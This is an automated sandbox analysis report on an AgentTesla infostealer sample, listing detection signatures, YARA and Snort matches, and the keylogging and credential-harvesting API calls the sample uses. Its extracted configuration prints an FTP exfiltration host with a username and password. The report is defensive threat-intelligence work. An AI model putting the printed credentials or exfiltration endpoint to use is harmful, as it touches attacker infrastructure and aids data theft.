Edit tour

Windows Analysis Report
7F7R8soxHM.exe

Overview

General Information

Sample name:	7F7R8soxHM.exe renamed because original name is a hash value
Original sample name:	8f537e91245bcc1510a9867cb88b12ea.exe
Analysis ID:	1447089
MD5:	8f537e91245bcc1510a9867cb88b12ea
SHA1:	dfc1fac222ea213d44aa9b5de65c83ffbd80ba0c
SHA256:	7615090de90b379091f499d125db3c25943f3992e9ed09dab3d2a701d11b2b01
Tags:	32exe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AgentTesla

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Contains functionality to log keystrokes (.Net Source)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses FTP

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

7F7R8soxHM.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\7F7R8soxHM.exe" MD5: 8F537E91245BCC1510A9867CB88B12EA)

RegSvcs.exe (PID: 7584 cmdline: "C:\Users\user\Desktop\7F7R8soxHM.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.transotraval.cl", "Username": "ugoomabless@transotraval.cl", "Password": "4)7@D4,-Q%Xj"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.2883490395.000000000295E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33a61:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33ad3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33b5d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33bef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33c59:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33ccb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33d61:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33df1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x30f55:$s2: GetPrivateProfileString 0x30650:$s3: get_OSFullName 0x31c63:$s5: remove_Key 0x31df3:$s5: remove_Key 0x32c9c:$s6: FtpWebRequest 0x33a43:$s7: logins 0x33fb5:$s7: logins 0x36cba:$s7: logins 0x36d78:$s7: logins 0x386ca:$s7: logins 0x37912:$s9: 1.85 (Hash, version 2, native byte-order)
00000001.00000002.2883490395.0000000002911000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2883490395.0000000002911000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: 7F7R8soxHM.exe PID: 7568	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 7F7R8soxHM.exe PID: 7568	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 7584	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7584	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.7F7R8soxHM.exe.1720000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.7F7R8soxHM.exe.1720000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.7F7R8soxHM.exe.1720000.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31c61:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31cd3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31d5d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31def:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31e59:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31ecb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x31f61:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31ff1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.7F7R8soxHM.exe.1720000.1.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2f155:$s2: GetPrivateProfileString 0x2e850:$s3: get_OSFullName 0x2fe63:$s5: remove_Key 0x2fff3:$s5: remove_Key 0x30e9c:$s6: FtpWebRequest 0x31c43:$s7: logins 0x321b5:$s7: logins 0x34eba:$s7: logins 0x34f78:$s7: logins 0x368ca:$s7: logins 0x35b12:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.7F7R8soxHM.exe.1720000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.7F7R8soxHM.exe.1720000.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.7F7R8soxHM.exe.1720000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33a61:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33ad3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33b5d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33bef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33c59:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33ccb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33d61:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33df1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.7F7R8soxHM.exe.1720000.1.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x30f55:$s2: GetPrivateProfileString 0x30650:$s3: get_OSFullName 0x31c63:$s5: remove_Key 0x31df3:$s5: remove_Key 0x32c9c:$s6: FtpWebRequest 0x33a43:$s7: logins 0x33fb5:$s7: logins 0x36cba:$s7: logins 0x36d78:$s7: logins 0x386ca:$s7: logins 0x37912:$s9: 1.85 (Hash, version 2, native byte-order)
1.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33a61:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33ad3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33b5d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33bef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33c59:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33ccb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33d61:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33df1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
1.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x30f55:$s2: GetPrivateProfileString 0x30650:$s3: get_OSFullName 0x31c63:$s5: remove_Key 0x31df3:$s5: remove_Key 0x32c9c:$s6: FtpWebRequest 0x33a43:$s7: logins 0x33fb5:$s7: logins 0x36cba:$s7: logins 0x36d78:$s7: logins 0x386ca:$s7: logins 0x37912:$s9: 1.85 (Hash, version 2, native byte-order)
Click to see the 7 entries

Snort Signatures

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 201.148.105.186

Timestamp:	05/24/24-11:18:15.551341
SID:	2855542
Source Port:	49731
Destination Port:	47566
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil via FTP - Source IP: 192.168.2.4 - Destination IP: 201.148.105.186

Timestamp:	05/24/24-11:18:14.933252
SID:	2029927
Source Port:	49730
Destination Port:	21
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 201.148.105.186

Timestamp:	05/24/24-11:18:15.551341
SID:	2851779
Source Port:	49731
Destination Port:	47566
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 7F7R8soxHM.exe

Avira: detected

Found malware configuration

Source: 1.2.RegSvcs.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.transotraval.cl", "Username": "ugoomabless@transotraval.cl", "Password": "4)7@D4,-Q%Xj"}

Multi AV Scanner detection for submitted file

Source: 7F7R8soxHM.exe	ReversingLabs: Detection: 65%
Source: 7F7R8soxHM.exe	Virustotal: Detection: 63%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.2% probability

Machine Learning detection for sample

Source: 7F7R8soxHM.exe

Joe Sandbox ML: detected

Source: 7F7R8soxHM.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: 7F7R8soxHM.exe, 00000000.00000003.1643867500.0000000004190000.00000004.00001000.00020000.00000000.sdmp, 7F7R8soxHM.exe, 00000000.00000003.1643414153.0000000004330000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 7F7R8soxHM.exe, 00000000.00000003.1643867500.0000000004190000.00000004.00001000.00020000.00000000.sdmp, 7F7R8soxHM.exe, 00000000.00000003.1643414153.0000000004330000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00ED4696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00ED4696
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EDC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00EDC9C7
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EDC93C FindFirstFileW,FindClose,	0_2_00EDC93C
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EDF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00EDF200
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EDF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00EDF35D
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EDF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00EDF65E
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00ED3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00ED3A2B
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00ED3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00ED3D4E
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EDBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00EDBF27

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.4:49730 -> 201.148.105.186:21
Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49731 -> 201.148.105.186:47566
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49731 -> 201.148.105.186:47566

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 201.148.105.186:47566

Source: Joe Sandbox View

ASN Name: HOSTINGCL HOSTINGCL

Source: unknown

FTP traffic detected: 201.148.105.186:21 -> 192.168.2.4:49730 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 05:18. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 05:18. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 05:18. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 05:18. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00EE25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00EE25E2

Source: global traffic

DNS traffic detected: DNS query: ftp.transotraval.cl

Source: RegSvcs.exe, 00000001.00000002.2883490395.000000000295E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2883490395.000000000296C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.transotraval.cl
Source: RegSvcs.exe, 00000001.00000002.2883490395.000000000295E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 7F7R8soxHM.exe, 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, R1W.cs

.Net Code: c5vTEt6e3SV

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00EE425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00EE425A

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00EE4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00EE4458

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

0_2_00EE425A

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00ED0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00ED0219

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00EFCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00EFCDAC

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.7F7R8soxHM.exe.1720000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.7F7R8soxHM.exe.1720000.1.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00E73B4C
Source: 7F7R8soxHM.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 7F7R8soxHM.exe, 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ab0ed4a8-f
Source: 7F7R8soxHM.exe, 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_2ab51996-9
Source: 7F7R8soxHM.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_3b4b08af-b
Source: 7F7R8soxHM.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_cc5768f8-7

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00ED40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,

0_2_00ED40B1

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00EC8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00EC8858

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00ED545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00ED545F

Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E7E800	0_2_00E7E800
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E9DBB5	0_2_00E9DBB5
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E7E060	0_2_00E7E060
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EF804A	0_2_00EF804A
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E84140	0_2_00E84140
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E92405	0_2_00E92405
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EA6522	0_2_00EA6522
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EF0665	0_2_00EF0665
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EA267E	0_2_00EA267E
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E86843	0_2_00E86843
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E9283A	0_2_00E9283A
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EA89DF	0_2_00EA89DF
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EF0AE2	0_2_00EF0AE2
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EA6A94	0_2_00EA6A94
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E88A0E	0_2_00E88A0E
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00ECEB07	0_2_00ECEB07
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00ED8B13	0_2_00ED8B13
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E9CD61	0_2_00E9CD61
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EA7006	0_2_00EA7006
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E83190	0_2_00E83190
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E8710E	0_2_00E8710E
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E71287	0_2_00E71287
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E933C7	0_2_00E933C7
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E9F419	0_2_00E9F419
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E916C4	0_2_00E916C4
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E85680	0_2_00E85680
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E858C0	0_2_00E858C0
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E978D3	0_2_00E978D3
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E91BB8	0_2_00E91BB8
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EA9D05	0_2_00EA9D05
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E7FE40	0_2_00E7FE40
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E9BFE6	0_2_00E9BFE6
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00E91FD0	0_2_00E91FD0
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_017136B0	0_2_017136B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_027A9408	1_2_027A9408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_027A4A58	1_2_027A4A58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_027A9BC0	1_2_027A9BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_027A3E40	1_2_027A3E40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_027ACE28	1_2_027ACE28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_027A4188	1_2_027A4188
